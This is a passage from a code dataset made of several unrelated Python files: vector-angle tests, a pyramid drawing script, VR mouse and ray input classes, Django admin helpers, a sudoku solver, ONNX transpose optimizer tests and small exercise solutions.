angle.\ndef testZeroAngle():\n for i in range(10):\n mult = np.random.randint(1, 10)\n vec1 = np.random.randint(1, 10, 2)\n vec2 = vec1 * mult\n assert (_vector.angle(vec1, vec2)) == 0\n\n# Test for right angle (90-deg) and straight angle (180-degree).\ndef testRightAndStraightAngle():\n for i in range(10):\n vec1 = np.random.randint(1, 10, 2)\n vec2 = np.array([-vec1[1], vec1[0]])\n vec3 = np.array([vec1[1], -vec1[0]])\n # Test for 90-degree.\n pytest.approx(_vector.angle(vec1, vec2), math.pi / 2)\n pytest.approx(_vector.angle(vec1, vec3), math.pi / 2)\n # Test for 180-degree.\n pytest.approx(_vector.angle(vec2, vec3), math.pi)\n\n# Test for one other angle.\ndef testArbitraryVector():\n for i in range(10):\n vec1 = np.random.randint(1, 10, 2)\n vec2 = np.random.randint(1, 10, 2)\n pytest.approx(_vector.angle(vec1, vec2), angle(vec1, vec2))\n\ndef testAngle():\n for i in range(10):\n theta = 1 / np.random.randint(1, 10)\n pytest.approx(theta, _vector.angle([np.cos(theta), np.sin(theta)], [1, 0]))\n pytest.approx(theta, _vector.angle([np.cos(theta), np.sin(-theta)], [1, 0]))\n","sub_path":"hw2/TommyLin/q2/test_vector.py","file_name":"test_vector.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"205393792","text":"# pyramid.py\n# Prints a pyramid made of n square bricks, n given by user.\n#\n# Hannah Lily Postman\n# 18 February 2016\n\nimport picture # Module to help us render visual\n\nwidth = eval(input( \"How wide is the canvas? \"))\nn = eval(input( \"How tall shall we make the pyramid (we also use this number for how many bricks to put in the base)? \"))\n\n#def DrawBrick(s):\n # Draws a square 'brick' with side length s\n #sideLength = n/width\n # canvas.drawRect(i*(s/2), y-s*i, s, y/n)\n\n \n\ndef Pyramid(width, n):\n canvas = picture.Picture(width, width)\n canvas.setOutlineColor(0,0,0)\n canvas.setFillColor(0, 255, 255)\n s = width/n # length for any side s of the square brick\n for i in range(0, n):\n xStart = i*(s/2) # Each row, move in half a brick's length\n yStart = width-s*i\n for i in range(0, n-i):\n canvas.drawRect(xStart, yStart, s, s) # Draw the block\n xStart = xStart + s # Start adjacent square to the rigt of the previous one\n\n\nPyramid(width, n)\n\n \n","sub_path":"Lab/lab3/Ignore/testPyramid2.py","file_name":"testPyramid2.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"104166417","text":"#!/usr/bin/python\n\n## @file\n# Contains classes MouseRayInput und 3DRayInput\n\n# import guacamole libraries\nimport avango\nimport avango.gua\nimport avango.script\nfrom avango.script import field_has_changed\nimport avango.daemon\n\nimport math\nimport EdgeContainer\n\n# Class for getting the mouse input\nclass MouseRayInput(avango.script.Script):\n\n sf_mouse_x = avango.SFFloat()\n sf_mouse_y = avango.SFFloat()\n sf_output_mat = avango.gua.SFMatrix4()\n \n ## Custom constructor.\n # @param PARENT_NODE Reference to \n # @param TRACKING_STATION \n def __init__(self, TRACKING_STATION):\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n self.tracking_sensor.Station.value = TRACKING_STATION\n #self.tracking_sensor.ReceiverOffset.value = avango.gua.make_identity_mat()\n #self.tracking_sensor.TransmitterOffset.value = avango.gua.make_identity_mat()\n \n self.mouse_sensor = MouseSensor()\n self.mouse_mover.my_constructor(self.tracking_sensor, PARENT_NODE.WorldTransform.value)\n self.pickray_matrix = self.mouse_mover.sf_output_mat\n\n self.sf_mouse_x.connect_from(self.tracking_sensor.Value0)\n self.sf_mouse_y.connect_from(self.tracking_sensor.Value1)\n \n self.plane_mat = avango.gua.make_trans_mat(0,1.18,3)\n self.mouse_mat = avango.gua.make_trans_mat(0,1.18,0.5)\n \n self.sf_output_mat.value = avango.gua.make_trans_mat(0,1.18,1)\n\n self._point2_old = avango.gua.Vec3(0,1,0)\n\n self.old_axis = avango.gua.Vec3(0,0,0)\n self.old_vec3 = avango.gua.Vec3(0,0,0)\n\n #callbacks:\n @field_has_changed(sf_mouse_x)\n def sf_mouse_x_changed(self):\n \n if self.plane_mat != None and self.mouse_mat != None: \n \n _mat = self.mouse_mat * avango.gua.make_trans_mat((0.01)*self.sf_mouse_x.value, \n (-0.02)*self.sf_mouse_y.value, \n 0)\n self.mouse_mat = _mat\n \n _point1 = self.plane_mat.get_translate()\n _point2 = self.mouse_mat.get_translate()\n \n _vec1 = _point1 - self._point2_old\n _vec2 = _point1 - _point2\n _vec3 = _vec1.cross(_vec2)\n \n _axis = _vec3\n if _vec1.x == _vec2.x and _vec1.y == _vec2.y and _vec1.z == _vec2.z :\n _axis = self.old_axis\n\n self.old_axis = _axis\n _axis.normalize()\n _angle = math.degrees(math.acos( round(_vec1.dot( _vec2) / (_vec1.length() * _vec2.length()),6)))\n _rotation_mat = avango.gua.make_rot_mat(_angle, _axis)\n\n self.sf_output_mat.value = self.sf_output_mat.value * _rotation_mat\n self._point2_old = _point2\n\n# Class to get the 3D input\nclass RayInput :\n\n ## Custom constructor.\n # @param TRACKING_TRANSMITTER_OFFSET \n # @param POINTER_TRACKING_STATION Is talking with the tracking station. \n def __init__(self, TRACKING_TRANSMITTER_OFFSET, POINTER_TRACKING_STATION):\n\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n self.tracking_sensor.Station.value = POINTER_TRACKING_STATION\n self.tracking_sensor.ReceiverOffset.value = avango.gua.make_identity_mat()\n self.tracking_sensor.TransmitterOffset.value = TRACKING_TRANSMITTER_OFFSET\n\n self.pickray_matrix = self.tracking_sensor.Matrix\n\n# Class to get the Key input\nclass KeyboardInput(avango.script.Script):\n\n sf_key_r = avango.SFBool()\n sf_key_c = avango.SFBool()\n\n ## Custom constructor.\n # @param TRACKING_TRANSMITTER_OFFSET \n # @param POINTER_TRACKING_STATION Is talking with the tracking station. \n def __init__(self):\n self.super(KeyboardInput).__init__()\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n\n def my_constructor(self, TRACKING_STATION):\n self.tracking_sensor.Station.value = TRACKING_STATION\n self.sf_key_c.connect_from(self.tracking_sensor.Button21)\n self.sf_key_r.connect_from(self.tracking_sensor.Button3)\n\n\n# Class for getting the mouse input and \n# A ray will be calculated from screen through your mouse cursor\nclass MouseInput(avango.script.Script):\n\n sf_button_left = avango.SFBool()\n sf_mouse_x = avango.SFFloat()\n sf_mouse_y = avango.SFFloat()\n\n sf_cursor_pos_mat = avango.gua.SFMatrix4()\n sf_ray_mat = avango.gua.SFMatrix4()\n\n \n ## Custom constructor.\n # @param PARENT_NODE Reference to \n # @param TRACKING_STATION \n def __init__(self):\n self.super(MouseInput).__init__()\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n #self.sf_cursor_pos_mat.value = avango.gua.make_identity_mat()\n self.mouse_pos_x = 0.0 \n self.mouse_pos_y = 0.0\n self.always_evaluate(True)\n\n def my_constructor(self, EYE_NODE, SCREEN_NODE ,TRACKING_STATION):\n self.tracking_sensor.Station.value = TRACKING_STATION\n #self.tracking_sensor.ReceiverOffset.value = avango.gua.make_identity_mat()\n #self.tracking_sensor.TransmitterOffset.value = avango.gua.make_identity_mat()\n self.EYE_NODE = EYE_NODE\n self.SCREEN_NODE = SCREEN_NODE\n\n # connections to the sensor (click, move mouse)\n self.sf_button_left.connect_from(self.tracking_sensor.Button0)\n self.sf_mouse_x.connect_from(self.tracking_sensor.Value0)\n self.sf_mouse_y.connect_from(self.tracking_sensor.Value1)\n \n \"\"\"def evaluate(self):\n self.mouse_pos_x += self.sf_mouse_x.value* 0.001\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.mouse_pos_y -= self.sf_mouse_y.value* 0.001\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.5), 0.3 * 0.5)\n self.sf_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\"\"\"\n\n @field_has_changed(sf_mouse_x)\n def moved_mouse_x(self):\n self.mouse_pos_x += self.sf_mouse_x.value* 0.001\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.sf_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n @field_has_changed(sf_mouse_y)\n def moved_mouse_y(self):\n self.mouse_pos_y -= self.sf_mouse_y.value* 0.001\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.4), 0.3 * 0.4)\n self.sf_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n \n\n @field_has_changed(sf_button_left)\n def clicked_left_button(self):\n if(self.sf_button_left.value):\n pass\n elif(self.sf_button_left.value == False):\n pass\n \n @field_has_changed(sf_cursor_pos_mat)\n def moved_cursor(self):\n _cursor_pos = self.sf_cursor_pos_mat.value.get_translate()\n _eye_pos = self.EYE_NODE.Transform.value.get_translate()\n #_eye_pos = self.proxy.Transform.value.get_translate()\n\n _dir = _cursor_pos - _eye_pos\n _dir.normalize()\n _ref = avango.gua.Vec3(0.0,0.0,-1.0)\n\n _axis = _ref.cross(_dir)\n _angle = math.acos(_ref.dot(_dir))\n _angle = math.degrees(_angle)\n _rot_mat = avango.gua.make_rot_mat(_angle, _axis)\n\n self.sf_ray_mat.value = avango.gua.make_trans_mat(_cursor_pos) * _rot_mat\n\n\n# Class for moving a cursor with the wasd key of a keyboard\nclass WASDMouseInput(avango.script.Script):\n\n sf_click_left = avango.SFBool()\n sf_mouse_x = avango.SFFloat()\n sf_mouse_y = avango.SFFloat()\n\n sf_in_cursor_worldpos_mat = avango.gua.SFMatrix4()\n sf_out_cursor_pos_mat = avango.gua.SFMatrix4()\n sf_ray_mat = avango.gua.SFMatrix4()\n\n sf_key_w = avango.SFBool()\n sf_key_a = avango.SFBool()\n sf_key_s = avango.SFBool()\n sf_key_d = avango.SFBool()\n ## Custom constructor.\n # @param TRACKING_TRANSMITTER_OFFSET \n # @param POINTER_TRACKING_STATION Is talking with the tracking station. \n def __init__(self):\n self.super(WASDMouseInput).__init__()\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n self.proxy_eye_node = avango.gua.nodes.TransformNode(Name = \"proxy_eye\")\n\n self.mouse_pos_x = 0.0 \n self.mouse_pos_y = 0.0\n self.always_evaluate(True)\n\n def my_constructor(self, TRACKING_STATION, SCREEN_NODE, MOUSE_TRANSFORM_NODE ):\n self.tracking_sensor.Station.value = TRACKING_STATION\n self.sf_click_left.connect_from(self.tracking_sensor.Button31)\n self.sf_key_w.connect_from(self.tracking_sensor.Button0)\n self.sf_key_a.connect_from(self.tracking_sensor.Button1)\n self.sf_key_s.connect_from(self.tracking_sensor.Button2)\n self.sf_key_d.connect_from(self.tracking_sensor.Button3)\n\n self.proxy_eye_node.Transform.value = avango.gua.make_trans_mat(0.0, 0.0, 0.6)\n SCREEN_NODE.Children.value.append(self.proxy_eye_node)\n # conntection to calc ray from eye through cursor position\n self.sf_in_cursor_worldpos_mat.connect_from(MOUSE_TRANSFORM_NODE.WorldTransform)\n\n @field_has_changed(sf_click_left)\n def clicked_left_btn(self):\n print(\"space pressed\")\n\n def evaluate(self):\n if (self.sf_key_d.value == True):\n self.mouse_pos_x += 0.002\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n if (self.sf_key_a.value == True):\n self.mouse_pos_x -= 0.002\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n if(self.sf_key_w.value):\n self.mouse_pos_y += 0.002\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.5), 0.3 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n if(self.sf_key_s.value):\n self.mouse_pos_y -= 0.002\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.5), 0.3 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n @field_has_changed(sf_in_cursor_worldpos_mat)\n def moved_cursor(self):\n _cursor_pos = self.sf_in_cursor_worldpos_mat.value.get_translate()\n _eye_pos = self.proxy_eye_node.WorldTransform.value.get_translate()\n\n _dir = _cursor_pos - _eye_pos\n _dir.normalize()\n _ref = avango.gua.Vec3(0.0,0.0,-1.0)\n\n _axis = _ref.cross(_dir)\n _angle = math.acos(_ref.dot(_dir))\n _angle = math.degrees(_angle)\n _rot_mat = avango.gua.make_rot_mat(_angle, _axis)\n\n self.sf_ray_mat.value = avango.gua.make_trans_mat(_cursor_pos) * _rot_mat","sub_path":"Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":10381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426713841","text":"import pandas as pd\r\nimport numpy as np\r\n \r\ndata = {'name': ['xy', 'abc', 'vishal', 'cds', 'hello'],\r\n 'age': [15, 17, 20, 18, 16],\r\n 'branch': [cse, ece,eee,mech,it],'year-sem': [1-1, 2-2, 1-2, 3-1, 4-1],'score': [95, 67, 70, 68, 86],}\r\n \r\ndf = pd.DataFrame(data, index = ['Acme', 'Acme', 'Bilbao', 'Bilbao', 'Bilbao'])\r\n \r\ndf_filtered = df.query('score>70')\r\nprint(df_filtered)","sub_path":"userinfo.py","file_name":"userinfo.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"3237663","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.admin import SimpleListFilter\n\n\nclass PublishableAdmin(admin.ModelAdmin):\n \"\"\"\n Overrides standard admin.ModelAdmin save_model method\n It sets user (author) based on data from requet.\n \"\"\"\n list_display = ['title', 'channel_name', 'date_available', 'published']\n list_filter = ['date_available', 'published', 'channel_name',\n 'child_class']\n search_fields = ['title', 'slug', 'headline', 'channel_name']\n exclude = ('user',)\n\n actions = ['publish']\n\n def publish(modeladmin, request, queryset):\n for obj in queryset:\n obj.published = not obj.published\n obj.save()\n publish.short_description = _(u'Publish/Unpublish')\n\n def save_model(self, request, obj, form, change):\n if getattr(obj, 'pk', None) is None:\n obj.user = get_user_model().objects.get(pk=request.user.pk)\n obj.date_insert = timezone.now()\n obj.site = Site.objects.get(pk=settings.SITE_ID)\n obj.date_update = timezone.now()\n obj.save()\n\n\nclass ChannelListFilter(SimpleListFilter):\n # Human-readable title which will be displayed in the\n # right admin sidebar just above the filter options.\n title = _(u'Channel')\n\n # Parameter for the filter that will be used in the URL query.\n parameter_name = 'channel'\n\n def lookups(self, request, model_admin):\n \"\"\"\n Returns a list of tuples. The first element in each\n tuple is the coded value for the option that will\n appear in the URL query. The second element is the\n human-readable name for the option that will appear\n in the right sidebar.\n \"\"\"\n qs = model_admin.queryset(request)\n qs = qs.distinct().values('channel_name', 'channel_long_slug')\n if qs:\n return set([(item['channel_long_slug'] or 'nochannel',\n item['channel_name'] or _(u'No channel'))\n for item in qs])\n\n def queryset(self, request, queryset):\n \"\"\"\n Returns the filtered queryset based on the value\n provided in the query string and retrievable via\n `self.value()`.\n \"\"\"\n if self.value() == \"nochannel\":\n queryset = queryset.filter(channel_long_slug__isnull=True)\n elif self.value():\n queryset = queryset.filter(channel_long_slug=self.value())\n\n return queryset\n\n\nclass BaseBoxAdmin(PublishableAdmin):\n\n prepopulated_fields = {\"slug\": [\"name\"]}\n list_display = ['name', 'channel_name', 'date_available', 'published']\n list_filter = [ChannelListFilter, 'date_available', 'published']\n raw_id_fields = ['channel', 'article']\n search_fields = ['name', 'slug', 'channel_name']\n\n fieldsets = (\n (_(u'Identification'), {\n 'fields': ('site', 'name', 'slug')}),\n (_(u'Relationships'), {\n 'fields': (('channel', 'article'),)}),\n (_(u'Publication'), {\n 'classes': ('extrapretty',),\n 'fields': ('published', 'date_available')}),\n )\n\n def queryset(self, request):\n qs = super(BaseBoxAdmin, self).queryset(request)\n try:\n # only supersusers can see queryset boxes\n if not request.user.is_superuser:\n qs = qs.filter(queryset__isnull=True)\n except:\n pass # admin model soes not have the queryset field\n return qs\n\n\ndef apply_rules(admin_class, app):\n \"\"\"\n To allow overrides of admin rules for opps apps\n it uses the settings.py to load the values\n\n example of use:\n\n your project's settings.py\n\n OPPS_ADMIN_RULES = {\n 'appname.ModelNameAdmin': {\n 'fieldsets': (\n (u'Identification', {\n 'fields': ('site', 'title', 'slug')}),\n ),\n 'list_display': (...),\n 'list_filter': (...),\n 'search_fields': (...),\n ...\n }\n }\n\n On appname/admin.py\n\n as a factory:\n\n from opps.core.admin import apply_rules\n ModelNameAdmin = apply_rules(ModelNameAdmin, 'appname')\n\n as a decorator:\n\n from opps.core.admin import apply_opps_rules\n\n @apply_opps_rules('appname')\n class ModelNameAdmin(admin.ModelAdmin):\n ...\n \"\"\"\n\n key = \"{0}.{1}\".format(app, admin_class.__name__)\n OPPS_ADMIN_RULES = getattr(settings, 'OPPS_ADMIN_RULES', {})\n rules = OPPS_ADMIN_RULES.get(key)\n\n if not rules:\n return admin_class\n\n fieldsets = rules.get('fieldsets')\n if fieldsets:\n new_items = [(_(item[0]), item[1]) for item in fieldsets]\n admin_class.fieldsets = new_items\n\n attrs = ('list_display', 'list_filter',\n 'search_fields', 'exclude', 'raw_id_fields',\n 'prepopulated_fields')\n\n for attr in attrs:\n to_apply = rules.get(attr)\n if to_apply:\n setattr(admin_class, attr, to_apply)\n\n field_overrides = rules.get('field_overrides')\n \"\"\"\n Allow field attr overrides before form is rendered\n 'images.ImagesAdmin': {\n 'field_overrides': {\n \"slug\": {\"help_text\": \"banana\"}\n }\n }\n \"\"\"\n if field_overrides:\n def get_form(self, request, obj=None, **kwargs):\n form = super(self.__class__, self)\\\n .get_form(request, obj, **kwargs)\n if hasattr(form, 'base_fields'):\n for field, attrs in field_overrides.iteritems():\n for attr, value in attrs.iteritems():\n if isinstance(value, (str, unicode)):\n value = _(value)\n try:\n setattr(form.base_fields[field], attr, value)\n except:\n pass # KeyError base_fields[field]\n return form\n admin_class.get_form = get_form\n\n # TODO:\n # form\n # inlines\n # actions\n # override methods\n\n return admin_class\n\n\ndef apply_opps_rules(app):\n\n def wrap(admin_class):\n admin_class = apply_rules(admin_class, app)\n return admin_class\n\n return wrap\n\napply_opps_rules.__doc__ = apply_rules.__doc__\n","sub_path":"opps/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85817500","text":"d = 9\nD = range(9)\ne = 3\ns = 0\n\nclass Board:\n def __init__(self, clues):\n self.squares = [[Square(r, c, self, clues[r][c]) for c in D] for r in D]\n\n self.B = [Section() for i in D]\n self.C = [Section() for i in D]\n self.R = [Section() for i in D]\n\n for r in D:\n for c in D:\n b = self.B[c // e + e * (r // 3)]\n s = self.squares[r][c]\n s.box = b\n b.squares.append(s)\n s.column = self.C[c]\n self.C[c].squares.append(s)\n s.row = self.R[r]\n self.R[r].squares.append(s)\n\n def __str__(self):\n s = \"\"\n\n for r in D:\n for c in D:\n s += \"%d \" % self.squares[r][c].value\n\n if not (c + 1) % 3:\n s += \" \"\n\n s += \"\\n\"\n\n if not (r + 1) % 3:\n s += \"\\n\"\n\n return s\n\nclass Section:\n def __init__(self):\n self.squares = []\n\n def __call__(self):\n values = [s.value for s in self.squares if s.value]\n return max(values.count(v) for v in values) <= 1\n\nclass Square:\n def __init__(self, r, c, board, value):\n self.r = r\n self.c = c\n self.board = board\n self.value = value\n\n def next_square(self):\n for r in D:\n for c in D:\n i = d * r + c\n\n if i <= d * self.r + self.c:\n continue\n\n s = self.board.squares[r][c]\n\n if not s.value:\n return s\n\n def solve(self):\n global s\n\n n = self.next_square()\n\n if self.value:\n return n.solve()\n\n for i in D:\n self.value = i + 1\n\n if not (self.box() and self.column() and self.row()):\n continue\n\n if not n:\n s += int(\"\".join(str(i.value) for i in self.board.squares[0][:3]))\n return\n\n n.solve()\n\n self.value = 0\n\ntext = open(\"sudoku.txt\").readlines()\n\nfor i in range(50):\n Board([[int(text[10 * i + 1 + r][c]) for c in D] for r in D]).squares[0][0].solve()\n\nprint(s)\n","sub_path":"096.py","file_name":"096.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"621648848","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT license.\n\n\"\"\"Unit Tests for optimizers such as TransposeOptimizer.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport numpy as np\nfrom onnx import helper, TensorProto\nfrom tf2onnx.graph import GraphUtil\nfrom backend_test_base import Tf2OnnxBackendTestBase\n\n\n# pylint: disable=missing-docstring,invalid-name,unused-argument,using-constant-test\n\n\nclass OptimizerTests(Tf2OnnxBackendTestBase):\n \"\"\"Run original model proto and modified model proto with onnxruntime, compare the results.\"\"\"\n\n def run_and_compare(self, output_names_with_port, onnx_feed_dict, origin_proto, debug=False, rtol=1e-07):\n origin_model_path = self.save_onnx_model(origin_proto, onnx_feed_dict, postfix=\"_origin\")\n\n new_proto = GraphUtil.opt_transposes_with_model_proto(origin_proto)\n\n self.assertTrue(new_proto, msg=\"model proto after optimizer should not be None\")\n\n new_model_path = self.save_onnx_model(new_proto, onnx_feed_dict, postfix=\"_opt\")\n\n previous = GraphUtil.get_node_count_from_onnx_graph(origin_proto.graph)\n current = GraphUtil.get_node_count_from_onnx_graph(new_proto.graph)\n\n self.assertTrue(current[\"Transpose\"] < previous[\"Transpose\"], msg=\"transpose ops count not changed\")\n\n if type(self).BACKEND == \"onnxruntime\":\n expected = self.run_onnxruntime(origin_model_path, onnx_feed_dict, output_names_with_port)\n actual = self.run_onnxruntime(new_model_path, onnx_feed_dict, output_names_with_port)\n else:\n raise ValueError(\"only onnxruntime is supported to test transpose optimizer\")\n\n for expected_val, actual_val in zip(expected, actual):\n self.assertAllClose(expected_val, actual_val, rtol=rtol, atol=0.)\n self.assertEqual(expected_val.dtype, actual_val.dtype)\n self.assertEqual(expected_val.shape, actual_val.shape)\n\n def test_relu(self):\n node1 = helper.make_node(\"Transpose\", [\"X\"], [\"Y\"], perm=[0, 2, 3, 1], name=\"trans_1\")\n node2 = helper.make_node(\"Relu\", [\"Y\"], [\"Z\"], name=\"relu\")\n node3 = helper.make_node(\"Transpose\", [\"Z\"], [\"Z1\"], perm=[0, 3, 1, 2], name=\"trans_2\")\n\n graph = helper.make_graph(\n [node1, node2, node3],\n \"relu-test\",\n [helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, (2, 3, 4, 5))],\n [helper.make_tensor_value_info(\"Z1\", TensorProto.FLOAT, (2, 3, 4, 5))],\n )\n\n model_proto = helper.make_model(graph, producer_name=\"onnx-tests\")\n self.run_and_compare([\"Z1\"], {\"X\": np.random.randn(2, 3, 4, 5).astype(np.float32)},\n model_proto)\n\n def test_leaky_relu(self):\n node1 = helper.make_node(\"Transpose\", [\"X\"], [\"Y\"], perm=[0, 2, 3, 1], name=\"trans_1\")\n node2 = helper.make_node(\"LeakyRelu\", [\"Y\"], [\"Z\"], alpha=0.02, name=\"relu\")\n node3 = helper.make_node(\"Transpose\", [\"Z\"], [\"Z1\"], perm=[0, 3, 1, 2], name=\"trans_2\")\n\n graph = helper.make_graph(\n [node1, node2, node3],\n \"LeakyRelu-test\",\n [helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, (2, 3, 4, 5))],\n [helper.make_tensor_value_info(\"Z1\", TensorProto.FLOAT, (2, 3, 4, 5))],\n )\n\n model_proto = helper.make_model(graph, producer_name=\"onnx-tests\")\n self.run_and_compare([\"Z1\"], {\"X\": np.random.randn(2, 3, 4, 5).astype(np.float32)},\n model_proto)\n\n def test_max(self):\n const_1_val = [2.0]\n const_1 = helper.make_tensor(\"const_1\", TensorProto.FLOAT, (1,), const_1_val)\n const_1_node = helper.make_node(\"Constant\", [], [\"const_1\"], value=const_1, name=\"const_1\")\n\n const_2_val = np.random.randn(2, 4, 5, 3).astype(np.float32).reshape(120).tolist()\n const_2 = helper.make_tensor(\"const_2\", TensorProto.FLOAT, (2, 4, 5, 3), const_2_val)\n const_2_node = helper.make_node(\"Constant\", [], [\"const_2\"], value=const_2, name=\"const_2\")\n\n const_3_val = np.random.randn(2, 4, 5, 3).astype(np.float32).reshape(120).tolist()\n const_3 = helper.make_tensor(\"const_3\", TensorProto.FLOAT, (2, 4, 5, 3), const_3_val)\n const_3_node = helper.make_node(\"Constant\", [], [\"const_3\"], value=const_3, name=\"const_3\")\n\n node1 = helper.make_node(\"Transpose\", [\"X\"], [\"Y\"], perm=[0, 2, 3, 1], name=\"trans_1\")\n node2 = helper.make_node(\"Max\", [\"Y\", \"const_3\", \"const_2\", \"const_1\"], [\"Z\"], name=\"max\")\n node3 = helper.make_node(\"Transpose\", [\"Z\"], [\"Z1\"], perm=[0, 3, 1, 2], name=\"trans_2\")\n\n graph = helper.make_graph(\n [const_1_node, const_2_node, const_3_node, node1, node2, node3],\n \"Max-test\",\n [helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, (2, 3, 4, 5))],\n [helper.make_tensor_value_info(\"Z1\", TensorProto.FLOAT, (2, 3, 4, 5))],\n )\n\n model_proto = helper.make_model(graph, producer_name=\"onnx-tests\")\n self.run_and_compare([\"Z1\"], {\"X\": np.random.randn(2, 3, 4, 5).astype(np.float32)},\n model_proto)\n\nif __name__ == \"__main__\":\n Tf2OnnxBackendTestBase.trigger(OptimizerTests)\n","sub_path":"tests/test_optimizers.py","file_name":"test_optimizers.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512888513","text":"def recognize(instruction):\n letters = ('A', 'B', 'C', 'D')\n numbers = ('1', '2', '3', '4')\n\n # Check for empty instruction and invalid single character instruction\n if len(instruction) < 2:\n return False\n\n # Check for first char error\n if instruction[0] not in letters:\n return False\n\n for i in range(1, len(instruction)):\n char = instruction[i]\n\n # Check if the character is valid\n if char not in letters and char not in numbers:\n return False\n\n # Check if the pattern is correct\n if char in letters and instruction[i-1] in numbers:\n return False\n\n return True\n","sub_path":"cap4/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412092691","text":"import sys\r\n#sys.stdin=open(\"input.txt\", \"r\")\r\n\r\nn = int(input())\r\nnList = list(map(int, input().split()))\r\n\r\nstrList = []\r\ncount = 0\r\n\r\ne = n-1\r\ns = 0\r\nbefore = 0\r\n\r\nwhile s <= e:\r\n\r\n if (nList[s] > before) and (nList[e] > before): #둘 다 before보다 큰 경우\r\n count += 1\r\n if nList[s] < nList[e]:\r\n strList.append(\"L\")\r\n before = nList[s]\r\n s += 1\r\n elif nList[e] < nList[s]:\r\n strList.append(\"R\")\r\n before = nList[e]\r\n e -= 1\r\n elif (nList[s] > before) or (nList[e] > before): #하나만 before보다 큰 경우\r\n count += 1\r\n if nList[s] > before:\r\n strList.append(\"L\")\r\n before = nList[s]\r\n s += 1\r\n elif nList[e] > before:\r\n strList.append(\"R\")\r\n before = nList[e]\r\n e -= 1\r\n else: break;\r\n \r\nprint(count)\r\nprint(\"\".join(strList))\r\n\r\n","sub_path":"section4/9. 증가수열 만들기.py","file_name":"9. 증가수열 만들기.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"593732099","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 13 08:48:17 2019\n\n@author: rick\n\"\"\"\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.contrib import slim\n\n\n\n\ndef logit_to_multi_label(logits, threshold):\n '''\n Args: \n logits, the tensor with shape [batch, num_classes],\n e.g. [[0.2,0.6,0.9],[0.3,0.1,0.8],...].\n threshold, if logits > threshold, than will be set, \n else will be clear.\n Return:\n labels, the tensor with shape [batch, num_classes],\n [num_classes] is a label list, non-zero bit means that have a label. \n '''\n label_list = tf.where(tf.greater(logits, threshold))\n logits_shape = tf.shape(logits)\n def _func_np(label_list_np, logits_shape_np):\n batch = logits_shape_np[0]\n max_num_classes = logits_shape_np[1]\n labels = np.zeros((batch, max_num_classes), np.int32)\n cnts = np.zeros((batch), np.int32)\n for i in range(np.shape(label_list_np)[0]):\n b = label_list_np[i, 0]\n l = label_list_np[i, 1]\n labels[b, cnts[b]] = l\n cnts[b] = cnts[b] + 1\n return labels\n labels = tf.py_func(_func_np, [label_list, logits_shape], tf.int32)\n return labels\n\ndef 